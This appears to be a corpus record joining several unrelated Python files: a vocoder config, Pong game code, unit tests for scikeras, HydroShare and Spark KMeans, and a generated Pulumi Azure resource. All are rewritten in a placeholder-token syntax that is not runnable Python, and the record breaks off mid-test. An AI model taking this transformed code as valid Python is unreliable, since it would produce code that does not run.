tag=""<line_sep>min_db=-115<line_sep>num_mels=128<line_sep>n_fft=2048<line_sep>hop_length=441<line_sep>win_size=<none><line_sep>sample_rate=44100<line_sep>frame_shift_ms=<none><line_sep>trim_fft_size=512<line_sep>trim_hop_size=128<line_sep>trim_top_db=23<line_sep>signal_normalization=<true><line_sep>allow_clipping_in_normalization=<true><line_sep>symmetric_mels=<true><line_sep>max_abs_value=4.0<line_sep>preemphasis=0.85<line_sep>min_level_db=-100<line_sep>ref_level_db=20<line_sep>fmin=50<line_sep>fmax=22000<line_sep>power=1.5<line_sep>griffin_lim_iters=60<line_sep>rescale=<false><line_sep>rescaling_max=0.95<line_sep>trim_silence=<false><line_sep>clip_mels_length=<true><line_sep>max_mel_frames=2000<line_sep>mel_win=128<line_sep>batch_size=24<line_sep>g_learning_rate=0.001<line_sep>d_learning_rate=0.001<line_sep>warmup_steps=100000<line_sep>decay_learning_rate=0.5<line_sep>exponential_moving_average=<true><line_sep>ema_decay=0.99<line_sep>reset_opt=<false><line_sep>reset_g_opt=<false><line_sep>reset_d_opt=<false><line_sep>local_condition_dim=128<line_sep>lambda_update_G=1<line_sep>multiscale_D=3<line_sep>lambda_adv=4.0<line_sep>lambda_fm_loss=0.0<line_sep>lambda_sc_loss=5.0<line_sep>lambda_mag_loss=5.0<line_sep>lambda_mel_loss=50.0<line_sep>use_mle_loss=<false><line_sep>lambda_mle_loss=5.0<line_sep>lambda_freq_loss=2.0<line_sep>lambda_energy_loss=100.0<line_sep>lambda_t_loss=200.0<line_sep>lambda_phase_loss=100.0<line_sep>lambda_f0_loss=1.0<line_sep>use_elu=<false><line_sep>de_preem=<false># train
up_org=<false><line_sep>use_one=<true><line_sep>use_small_D=<false><line_sep>use_condnet=<true><line_sep>use_depreem=<false># inference
use_msd=<false><line_sep>model_type="tfgan"# or bytewave, frame level vocoder using istft
use_hjcud=<false><line_sep>no_skip=<false><line_sep>out_channels=1<line_sep>use_postnet=<false># wn in postnet
use_wn=<false># wn in resstack
up_type="transpose"<line_sep>use_smooth=<false><line_sep>use_drop=<false><line_sep>use_shift_scale=<false><line_sep>use_gcnn=<false><line_sep>resstack_depth=[6 6 6 6]<line_sep>kernel_size=[3 3 3 3]<line_sep>channels=512<line_sep>use_f0_loss=<false><line_sep>use_sine=<false><line_sep>use_cond_rnn=<false><line_sep>use_rnn=<false><line_sep>f0_step=120<line_sep>use_lowfreq_loss=<false><line_sep>lambda_lowfreq_loss=1.0<line_sep>use_film=<false><line_sep>use_mb_mr_gan=<false><line_sep>use_mssl=<false><line_sep>use_ml_gan=<false><line_sep>use_mb_gan=<true><line_sep>use_mpd=<false><line_sep>use_spec_gan=<true><line_sep>use_rwd=<false><line_sep>use_mr_gan=<true><line_sep>use_pqmf_rwd=<false><line_sep>no_sine=<false><line_sep>use_frame_mask=<false><line_sep>lambda_var_loss=0.0<line_sep>discriminator_train_start_steps=40000# 80k
aux_d_train_start_steps=40000# 100k
rescale_out=0.40<line_sep>use_dist=<true><line_sep>dist_backend="nccl"<line_sep>dist_url="tcp://localhost:12345"<line_sep>world_size=1<line_sep>mel_weight_torch=torch.tensor([19.40951426 19.94047336 20.4859038 21.04629067 21.62194148 22.21335214 22.8210215 23.44529231 24.08660962 24.74541882 25.42234287 26.11770576 26.83212784 27.56615283 28.32007747 29.0947679 29.89060111 30.70832636 31.54828121 32.41121487 33.29780773 34.20865341 35.14437675 36.1056621 37.09332763 38.10795802 39.15039691 40.22119881 41.32154931 42.45172373 43.61293329 44.80609379 46.031602 47.29070223 48.58427549 49.91327905 51.27863232 52.68119708 54.1222372 55.60274206 57.12364703 58.68617876 60.29148652 61.94081306 63.63501986 65.37562658 67.16408954 69.00109084 70.88850318 72.82736101 74.81985537 76.86654792 78.96885475 81.12900906 83.34840929 85.62810662 87.97005418 90.37689804 92.84887686 95.38872881 97.99777002 100.67862715 103.43232942 106.26140638 109.16827015 112.15470471 115.22184756 118.37439245 121.6122689 124.93877158 128.35661454 131.86761321 135.47417938 139.18059494 142.98713744 146.89771854 150.91684347 155.0446638 159.28614648 163.64270198 168.12035831 172.71749158 177.44220154 182.29556933 187.28286676 192.40502126 197.6682721 203.07516896 208.63088733 214.33770931 220.19910108 226.22363072 232.41087124 238.76803591 245.30079083 252.01064464 258.90261676 265.98474 273.26010248 280.73496362 288.41440094 296.30489752 304.41180337 312.7377183 321.28877878 330.07870237 339.10812951 348.38276173 357.91393924 367.70513992 377.76413924 388.09467408 398.70920178 409.61813793 420.81980127 432.33215467 444.16083117 456.30919947 468.78589276 481.61325588 494.78824596 508.31969844 522.2238331 536.51163441 551.18859414 566.26142988 581.75006061 597.66210737 ])<line_sep>x_orig=np.linspace(1 mel_weight_torch.shape[0] num=mel_weight_torch.shape[0])<line_sep>x_orig_torch=torch.linspace(1 mel_weight_torch.shape[0] steps=mel_weight_torch.shape[0])<line_sep>@classmethod<def_stmt>get_mel_weight 
cls percent=1 a=18.8927416350036 b=0.0269863588184314<block_start>b=percent<times>b<def_stmt>func a b x<block_start><return>a<times>np.exp(b<times>x)<block_end><return>func(a b Config.x_orig)<block_end>@classmethod<def_stmt>get_mel_weight_torch cls percent=1 a=18.8927416350036 b=0.0269863588184314<block_start>b=percent<times>b<def_stmt>func a b x<block_start><return>a<times>torch.exp(b<times>x)<block_end><return>func(a b Config.x_orig_torch)<block_end><block_end> |
<import_stmt>subprocess<import_stmt>pytest<import_from_stmt>build.platform.python.tests testlib<line_sep>PYTHON_VERSIONS=["2.7" "3.4" "3.5" "3.6"]# 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver" PYTHON_VERSIONS)<def_stmt>test_version_matched pyver<block_start>testlib.check_python_version(pyver)<block_end>@pytest.mark.parametrize("pyver" PYTHON_VERSIONS)<def_stmt>test_python_max_unicode_bytes pyver<block_start>cmd=[testlib.get_python_bin(pyver) '-c' 'import sys; print(sys.maxunicode)']<line_sep>maxunicode=subprocess.check_output(cmd stderr=subprocess.STDOUT).decode('utf-8')<assert_stmt>int(maxunicode)<g>65535 "Found UCS2 build"<block_end>@pytest.mark.parametrize("pyver" PYTHON_VERSIONS)<def_stmt>test_python_imports pyver<block_start>imports={"2.7":['pkg_resources'] "3.4":[] "3.5":['pkg_resources'] "3.6":[] }<for_stmt>imp imports[pyver]<block_start>subprocess.check_call([testlib.get_python_bin(pyver) '-c' 'import '+imp])<block_end><block_end> |
<import_stmt>pygame<import_from_stmt>pygame.locals *<import_from_stmt>paddle Paddle<import_from_stmt>ball Ball<import_from_stmt>inputs handle_events handle_input<import_from_stmt>constants SCREEN_WIDTH SCREEN_HEIGHT WHITE RED<line_sep>ball=<none><line_sep>left_paddle=<none><line_sep>right_paddle=<none><line_sep>pygame.init()<line_sep>screen=pygame.display.set_mode((SCREEN_WIDTH SCREEN_HEIGHT))<line_sep>pygame.display.set_caption("Python PONG")<line_sep>clock=pygame.time.Clock()<line_sep>done=[<false>]<line_sep>is_game_over=[<false>]<def_stmt>setup_game <block_start><global>ball<line_sep><global>left_paddle<line_sep><global>right_paddle<line_sep>ball=Ball((SCREEN_WIDTH<floordiv>2 SCREEN_HEIGHT<floordiv>2))<line_sep>left_paddle=Paddle()<line_sep>right_paddle=Paddle()<line_sep>right_paddle.rect.x=SCREEN_WIDTH-right_paddle.rect.width<block_end><def_stmt>draw_game_over <block_start>font=pygame.font.Font("freesansbold.ttf" 32)<line_sep>game_over=font.render("GAME OVER" <true> RED)<line_sep>game_over_rect=game_over.get_rect()<line_sep>game_over_rect.center=(SCREEN_WIDTH<floordiv>2 SCREEN_HEIGHT<floordiv>2)<line_sep>screen.blit(game_over game_over_rect)<block_end><def_stmt>draw_game <block_start>left_paddle.draw(screen)<line_sep>right_paddle.draw(screen)<line_sep>ball.draw(screen)<block_end><def_stmt>draw <block_start>screen.fill(WHITE)<if_stmt>is_game_over[0]<block_start>draw_game_over()<block_end><else_stmt><block_start>draw_game()<block_end>pygame.display.flip()<block_end><def_stmt>update <block_start>handle_events(done)<if_stmt><not>is_game_over[0]<block_start>handle_input(left_paddle right_paddle)<line_sep>ball.update(left_paddle right_paddle is_game_over)<block_end><block_end>setup_game()<while_stmt><not>done[0]<block_start>clock.tick(30)<line_sep>update()<line_sep>draw()<block_end>pygame.quit()<line_sep> |
<import_from_stmt>django.test TestCase<import_from_stmt>django.contrib.auth.models Group<import_from_stmt>hs_access_control.models PrivilegeCodes<import_from_stmt>hs_core hydroshare<import_from_stmt>hs_core.testing MockIRODSTestCaseMixin<import_from_stmt>hs_access_control.tests.utilities global_reset is_equal_to_as_set<class_stmt>T09GroupPublic(MockIRODSTestCaseMixin TestCase)<block_start><def_stmt>setUp self<block_start>super(T09GroupPublic self).setUp()<line_sep>global_reset()<line_sep>self.group,_=Group.objects.get_or_create(name='Hydroshare Author')<line_sep>self.admin=hydroshare.create_account('<EMAIL>' username='admin' first_name='administrator' last_name='couch' superuser=<true> groups=[])<line_sep>self.dog=hydroshare.create_account('<EMAIL>' username='dog' first_name='<NAME>' last_name='last_name_dog' superuser=<false> groups=[])<line_sep>self.squirrels=hydroshare.create_resource(resource_type='GenericResource' owner=self.dog title='all about chasing squirrels' metadata=[] )<line_sep>self.holes=hydroshare.create_resource(resource_type='GenericResource' owner=self.dog title='all about storing bones in holes' metadata=[] )<line_sep># dog owns canines group
self.canines=self.dog.uaccess.create_group(title='canines' description="We are the canines")<block_end><def_stmt>test_public_resources self<block_start>""" public resources contain those resources that are public and discoverable """<line_sep>res=self.canines.gaccess.public_resources<line_sep>self.assertTrue(is_equal_to_as_set(res []))<line_sep>self.dog.uaccess.share_resource_with_group(self.squirrels self.canines PrivilegeCodes.VIEW)<line_sep>self.dog.uaccess.share_resource_with_group(self.holes self.canines PrivilegeCodes.VIEW)<line_sep>res=self.canines.gaccess.public_resources<line_sep>self.assertTrue(is_equal_to_as_set(res []))<line_sep>self.holes.raccess.public=<true><line_sep>self.holes.raccess.discoverable=<true><line_sep>self.holes.raccess.save()# this avoids regular requirements for "public"
res=self.canines.gaccess.public_resources<line_sep>self.assertTrue(is_equal_to_as_set(res [self.holes]))<for_stmt>r res<block_start>self.assertEqual(r.public r.raccess.public)<line_sep>self.assertEqual(r.discoverable r.raccess.discoverable)<line_sep>self.assertEqual(r.published r.raccess.published)<line_sep>self.assertEqual(r.group_name self.canines.name)<line_sep>self.assertEqual(r.group_id self.canines.id)<block_end>self.squirrels.raccess.discoverable=<true><line_sep>self.squirrels.raccess.save()<line_sep>res=self.canines.gaccess.public_resources<line_sep>self.assertTrue(is_equal_to_as_set(res [self.holes self.squirrels]))<for_stmt>r res<block_start>self.assertEqual(r.public r.raccess.public)<line_sep>self.assertEqual(r.discoverable r.raccess.discoverable)<line_sep>self.assertEqual(r.published r.raccess.published)<line_sep>self.assertEqual(r.group_name self.canines.name)<line_sep>self.assertEqual(r.group_id self.canines.id)<block_end><block_end><block_end> |
<import_from_stmt>.grid_attention_example run_grid_attention_example<import_from_stmt>.region_attention_example run_region_attention_example<line_sep> |
<import_stmt>numpy<as>np<import_stmt>pytest<import_from_stmt>tensorflow.keras losses<as>losses_module<import_from_stmt>tensorflow.keras metrics<as>metrics_module<import_from_stmt>scikeras.utils loss_name metric_name<class_stmt>CustomLoss(losses_module.Loss)<block_start><pass><block_end><class_stmt>CustomMetric(metrics_module.AUC)<block_start><pass><block_end>@pytest.mark.parametrize("obj" ["categorical_crossentropy" "CategoricalCrossentropy" losses_module.categorical_crossentropy losses_module.CategoricalCrossentropy losses_module.CategoricalCrossentropy() ] )<def_stmt>test_loss_invariance obj<block_start>"""Test to make sure loss_name returns same string no matter which object
is passed (str, function, class, type)"""<assert_stmt>loss_name(obj)<eq>"categorical_crossentropy"<block_end>@pytest.mark.parametrize("obj" [CustomLoss CustomLoss()])<def_stmt>test_custom_loss obj<block_start><assert_stmt>loss_name(obj)<eq>"custom_loss"<block_end>@pytest.mark.parametrize("obj" ["categorical_crossentropy" "CategoricalCrossentropy" metrics_module.categorical_crossentropy metrics_module.CategoricalCrossentropy metrics_module.CategoricalCrossentropy() ] )<def_stmt>test_metric_invariance obj<block_start>"""Test to make sure same metric returned no matter which object passed"""<assert_stmt>metric_name(obj)<eq>"categorical_crossentropy"<block_end>@pytest.mark.parametrize("loss" [object() object list()])<def_stmt>test_loss_types loss<block_start><with_stmt>pytest.raises(TypeError match="``loss`` must be a")<block_start>loss_name(loss)<block_end><block_end><def_stmt>test_unknown_loss_raises <block_start><with_stmt>pytest.raises(ValueError match="Unknown loss function")<block_start>loss_name("unknown_loss")<block_end><block_end>@pytest.mark.parametrize("obj" [object() object list()])<def_stmt>test_metric_types obj<block_start><with_stmt>pytest.raises(TypeError match="``metric`` must be a")<block_start>metric_name(obj)<block_end><block_end><def_stmt>test_unknown_metric <block_start><with_stmt>pytest.raises(ValueError match="Unknown metric function")<block_start>metric_name("unknown_metric")<block_end><block_end>@pytest.mark.parametrize("metric" [CustomMetric CustomMetric()])<def_stmt>test_custom_metric metric<block_start><assert_stmt>metric_name(metric)<eq>"custom_metric"<block_end> |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
<import_stmt>warnings<import_stmt>pulumi<import_stmt>pulumi.runtime<import_from_stmt>typing Any Mapping Optional Sequence Union overload<import_from_stmt>.. _utilities<line_sep>__all__=['ProductApiArgs' 'ProductApi']<line_sep>@pulumi.input_type<class_stmt>ProductApiArgs<block_start><def_stmt>__init__ __self__ * api_management_name:pulumi.Input[str] api_name:pulumi.Input[str] product_id:pulumi.Input[str] resource_group_name:pulumi.Input[str]<block_start>"""
The set of arguments for constructing a ProductApi resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep>pulumi.set(__self__ "api_management_name" api_management_name)<line_sep>pulumi.set(__self__ "api_name" api_name)<line_sep>pulumi.set(__self__ "product_id" product_id)<line_sep>pulumi.set(__self__ "resource_group_name" resource_group_name)<block_end>@property@pulumi.getter(name="apiManagementName")<def_stmt>api_management_name self<arrow>pulumi.Input[str]<block_start>"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_management_name")<block_end>@api_management_name.setter<def_stmt>api_management_name self value:pulumi.Input[str]<block_start>pulumi.set(self "api_management_name" value)<block_end>@property@pulumi.getter(name="apiName")<def_stmt>api_name self<arrow>pulumi.Input[str]<block_start>"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_name")<block_end>@api_name.setter<def_stmt>api_name self value:pulumi.Input[str]<block_start>pulumi.set(self "api_name" value)<block_end>@property@pulumi.getter(name="productId")<def_stmt>product_id self<arrow>pulumi.Input[str]<block_start>"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "product_id")<block_end>@product_id.setter<def_stmt>product_id self value:pulumi.Input[str]<block_start>pulumi.set(self "product_id" value)<block_end>@property@pulumi.getter(name="resourceGroupName")<def_stmt>resource_group_name self<arrow>pulumi.Input[str]<block_start>"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "resource_group_name")<block_end>@resource_group_name.setter<def_stmt>resource_group_name self value:pulumi.Input[str]<block_start>pulumi.set(self "resource_group_name" value)<block_end><block_end>@pulumi.input_type<class_stmt>_ProductApiState<block_start><def_stmt>__init__ __self__ * api_management_name:Optional[pulumi.Input[str]]=<none> api_name:Optional[pulumi.Input[str]]=<none> product_id:Optional[pulumi.Input[str]]=<none> resource_group_name:Optional[pulumi.Input[str]]=<none><block_start>"""
Input properties used for looking up and filtering ProductApi resources.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<if_stmt>api_management_name<is><not><none><block_start>pulumi.set(__self__ "api_management_name" api_management_name)<block_end><if_stmt>api_name<is><not><none><block_start>pulumi.set(__self__ "api_name" api_name)<block_end><if_stmt>product_id<is><not><none><block_start>pulumi.set(__self__ "product_id" product_id)<block_end><if_stmt>resource_group_name<is><not><none><block_start>pulumi.set(__self__ "resource_group_name" resource_group_name)<block_end><block_end>@property@pulumi.getter(name="apiManagementName")<def_stmt>api_management_name self<arrow>Optional[pulumi.Input[str]]<block_start>"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_management_name")<block_end>@api_management_name.setter<def_stmt>api_management_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "api_management_name" value)<block_end>@property@pulumi.getter(name="apiName")<def_stmt>api_name self<arrow>Optional[pulumi.Input[str]]<block_start>"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_name")<block_end>@api_name.setter<def_stmt>api_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "api_name" value)<block_end>@property@pulumi.getter(name="productId")<def_stmt>product_id self<arrow>Optional[pulumi.Input[str]]<block_start>"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "product_id")<block_end>@product_id.setter<def_stmt>product_id self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "product_id" value)<block_end>@property@pulumi.getter(name="resourceGroupName")<def_stmt>resource_group_name self<arrow>Optional[pulumi.Input[str]]<block_start>"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "resource_group_name")<block_end>@resource_group_name.setter<def_stmt>resource_group_name self value:Optional[pulumi.Input[str]]<block_start>pulumi.set(self "resource_group_name" value)<block_end><block_end><class_stmt>ProductApi(pulumi.CustomResource)<block_start>@overload<def_stmt>__init__ __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> api_management_name:Optional[pulumi.Input[str]]=<none> api_name:Optional[pulumi.Input[str]]=<none> product_id:Optional[pulumi.Input[str]]=<none> resource_group_name:Optional[pulumi.Input[str]]=<none> __props__=<none><block_start>"""
Manages an API Management API Assignment to a Product.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_service = azure.apimanagement.get_service(name="example-api",
resource_group_name="example-resources")
example_api = azure.apimanagement.get_api(name="search-api",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name,
revision="2")
example_product = azure.apimanagement.get_product(product_id="my-product",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
example_product_api = azure.apimanagement.ProductApi("exampleProductApi",
api_name=example_api.name,
product_id=example_product.product_id,
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
```
## Import
API Management Product API's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/productApi:ProductApi example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/service1/products/exampleId/apis/apiId
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep><ellipsis><block_end>@overload<def_stmt>__init__ __self__ resource_name:str args:ProductApiArgs opts:Optional[pulumi.ResourceOptions]=<none><block_start>"""
Manages an API Management API Assignment to a Product.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_service = azure.apimanagement.get_service(name="example-api",
resource_group_name="example-resources")
example_api = azure.apimanagement.get_api(name="search-api",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name,
revision="2")
example_product = azure.apimanagement.get_product(product_id="my-product",
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
example_product_api = azure.apimanagement.ProductApi("exampleProductApi",
api_name=example_api.name,
product_id=example_product.product_id,
api_management_name=example_service.name,
resource_group_name=example_service.resource_group_name)
```
## Import
API Management Product API's can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:apimanagement/productApi:ProductApi example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.ApiManagement/service/service1/products/exampleId/apis/apiId
```
:param str resource_name: The name of the resource.
:param ProductApiArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""<line_sep><ellipsis><block_end><def_stmt>__init__ __self__ resource_name:str *args **kwargs<block_start>resource_args,opts=_utilities.get_resource_args_opts(ProductApiArgs pulumi.ResourceOptions *args **kwargs)<if_stmt>resource_args<is><not><none><block_start>__self__._internal_init(resource_name opts **resource_args.__dict__)<block_end><else_stmt><block_start>__self__._internal_init(resource_name *args **kwargs)<block_end><block_end><def_stmt>_internal_init __self__ resource_name:str opts:Optional[pulumi.ResourceOptions]=<none> api_management_name:Optional[pulumi.Input[str]]=<none> api_name:Optional[pulumi.Input[str]]=<none> product_id:Optional[pulumi.Input[str]]=<none> resource_group_name:Optional[pulumi.Input[str]]=<none> __props__=<none><block_start><if_stmt>opts<is><none><block_start>opts=pulumi.ResourceOptions()<block_end><if_stmt><not>isinstance(opts pulumi.ResourceOptions)<block_start><raise>TypeError('Expected resource options to be a ResourceOptions instance')<block_end><if_stmt>opts.version<is><none><block_start>opts.version=_utilities.get_version()<block_end><if_stmt>opts.id<is><none><block_start><if_stmt>__props__<is><not><none><block_start><raise>TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')<block_end>__props__=ProductApiArgs.__new__(ProductApiArgs)<if_stmt>api_management_name<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'api_management_name'")<block_end>__props__.__dict__["api_management_name"]=api_management_name<if_stmt>api_name<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'api_name'")<block_end>__props__.__dict__["api_name"]=api_name<if_stmt>product_id<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing required property 'product_id'")<block_end>__props__.__dict__["product_id"]=product_id<if_stmt>resource_group_name<is><none><and><not>opts.urn<block_start><raise>TypeError("Missing 
required property 'resource_group_name'")<block_end>__props__.__dict__["resource_group_name"]=resource_group_name<block_end>super(ProductApi __self__).__init__('azure:apimanagement/productApi:ProductApi' resource_name __props__ opts)<block_end>@staticmethod<def_stmt>get resource_name:str id:pulumi.Input[str] opts:Optional[pulumi.ResourceOptions]=<none> api_management_name:Optional[pulumi.Input[str]]=<none> api_name:Optional[pulumi.Input[str]]=<none> product_id:Optional[pulumi.Input[str]]=<none> resource_group_name:Optional[pulumi.Input[str]]=<none><arrow>'ProductApi'<block_start>"""
Get an existing ProductApi resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] api_management_name: The name of the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] api_name: The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] product_id: The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep>opts=pulumi.ResourceOptions.merge(opts pulumi.ResourceOptions(id=id))<line_sep>__props__=_ProductApiState.__new__(_ProductApiState)<line_sep>__props__.__dict__["api_management_name"]=api_management_name<line_sep>__props__.__dict__["api_name"]=api_name<line_sep>__props__.__dict__["product_id"]=product_id<line_sep>__props__.__dict__["resource_group_name"]=resource_group_name<line_sep><return>ProductApi(resource_name opts=opts __props__=__props__)<block_end>@property@pulumi.getter(name="apiManagementName")<def_stmt>api_management_name self<arrow>pulumi.Output[str]<block_start>"""
The name of the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_management_name")<block_end>@property@pulumi.getter(name="apiName")<def_stmt>api_name self<arrow>pulumi.Output[str]<block_start>"""
The Name of the API Management API within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "api_name")<block_end>@property@pulumi.getter(name="productId")<def_stmt>product_id self<arrow>pulumi.Output[str]<block_start>"""
The ID of the API Management Product within the API Management Service. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "product_id")<block_end>@property@pulumi.getter(name="resourceGroupName")<def_stmt>resource_group_name self<arrow>pulumi.Output[str]<block_start>"""
The name of the Resource Group in which the API Management Service exists. Changing this forces a new resource to be created.
"""<line_sep><return>pulumi.get(self "resource_group_name")<block_end><block_end> |
_base_=['../_base_/models/flownet2/flownet2sd.py' '../_base_/datasets/chairssdhom_384x448.py' '../_base_/schedules/schedule_s_long.py' '../_base_/default_runtime.py']<line_sep> |
<import_from_stmt>gazette.spiders.base.fecam FecamGazetteSpider<class_stmt>ScSaoDomingosSpider(FecamGazetteSpider)<block_start>name="sc_sao_domingos"<line_sep>FECAM_QUERY="cod_entidade:244"<line_sep>TERRITORY_ID="4216107"<block_end> |
<import_stmt>numpy<as>np<import_from_stmt>sklearn.cluster KMeans<import_from_stmt>splearn.cluster SparkKMeans<import_from_stmt>splearn.utils.testing SplearnTestCase assert_array_almost_equal<class_stmt>TestKMeans(SplearnTestCase)<block_start><def_stmt>test_same_centroids self<block_start>X,y,X_rdd=self.make_blobs(centers=4 n_samples=200000)<line_sep>local=KMeans(n_clusters=4 init='k-means++' random_state=42)<line_sep>dist=SparkKMeans(n_clusters=4 init='k-means++' random_state=42)<line_sep>local.fit(X)<line_sep>dist.fit(X_rdd)<line_sep>local_centers=np.sort(local.cluster_centers_ axis=0)<line_sep>dist_centers=np.sort(dist.cluster_centers_ axis=0)<line_sep>assert_array_almost_equal(local_centers dist_centers decimal=4)<block_end><block_end> |
# Lint as: python3
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Common utilities and data structures for swap curve construction."""<import_from_stmt>tf_quant_finance types<import_from_stmt>tf_quant_finance utils<line_sep>__all__=['SwapCurveBuilderResult']<line_sep>@utils.dataclass<class_stmt>SwapCurveBuilderResult<block_start>"""Swap curve calibration results.
Attributes:
times: Rank 1 real `Tensor`. Times for the computed rates.
rates: Rank 1 `Tensor` of the same dtype as `times`. The inferred zero
rates.
discount_factors: Rank 1 `Tensor` of the same dtype as `times`. The inferred
discount factors.
initial_rates: Rank 1 `Tensor` of the same dtype as `times`. The initial
guess for the rates.
converged: Scalar boolean `Tensor`. Whether the procedure converged.
failed: Scalar boolean `Tensor`. Whether the procedure failed.
iterations: Scalar int32 `Tensor`. Number of iterations performed.
objective_value: Scalar real `Tensor`. The objective function at the optimal
soultion.
"""<line_sep>times:types.RealTensor<line_sep>rates:types.RealTensor<line_sep>discount_factors:types.RealTensor<line_sep>initial_rates:types.RealTensor<line_sep>converged:types.BoolTensor<line_sep>failed:types.BoolTensor<line_sep>iterations:types.IntTensor<line_sep>objective_value:types.RealTensor<block_end> |
<def_stmt>kw1 <block_start><pass><block_end> |
from django.db import models

from mayan.apps.testing.tests.base import BaseTestCase

from ..classes import QuerysetParametersSerializer


class QuerysetParametersSerializerTestCase(BaseTestCase):
    """Exercise decompose/rebuild round trips of QuerysetParametersSerializer."""

    def setUp(self):
        super().setUp()
        # Parent model plus a child model pointing at it via a FK, so both
        # plain and relation-based filters can be round-tripped.
        self.TestModelParent = self._create_test_model(
            model_name='TestModelParent'
        )
        self.TestModelChild = self._create_test_model(
            fields={
                'parent': models.ForeignKey(
                    on_delete=models.CASCADE, related_name='children',
                    to='TestModelParent'
                )
            }, model_name='TestModelChild'
        )
        self._test_object_parent = self.TestModelParent.objects.create()
        self.TestModelChild.objects.create(
            parent_id=self._test_object_parent.pk
        )

    def _assertQuerysetEqual(self):
        # Compare the rebuilt queryset against the original one.
        representations = [repr(entry) for entry in self.queryset_rebuilt]
        self.assertQuerysetEqual(
            qs=self.queryset_original, values=representations
        )

    def test_without_kwargs(self):
        self.queryset_original = self.TestModelParent.objects.all()

        decomposed_queryset = QuerysetParametersSerializer.decompose(
            _model=self.TestModelParent, _method_name='all'
        )
        self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
            decomposed_queryset=decomposed_queryset
        )

        self._assertQuerysetEqual()

    def test_foreign_key_model(self):
        self.queryset_original = self.TestModelChild.objects.all()

        decomposed_queryset = QuerysetParametersSerializer.decompose(
            _model=self.TestModelChild, _method_name='filter',
            parent=self._test_object_parent
        )
        self.queryset_rebuilt = QuerysetParametersSerializer.rebuild(
            decomposed_queryset=decomposed_queryset
        )

        self._assertQuerysetEqual()

    def test_foreign_key_model_id_query(self):
        self.queryset_original = self.TestModelChild.objects.all()

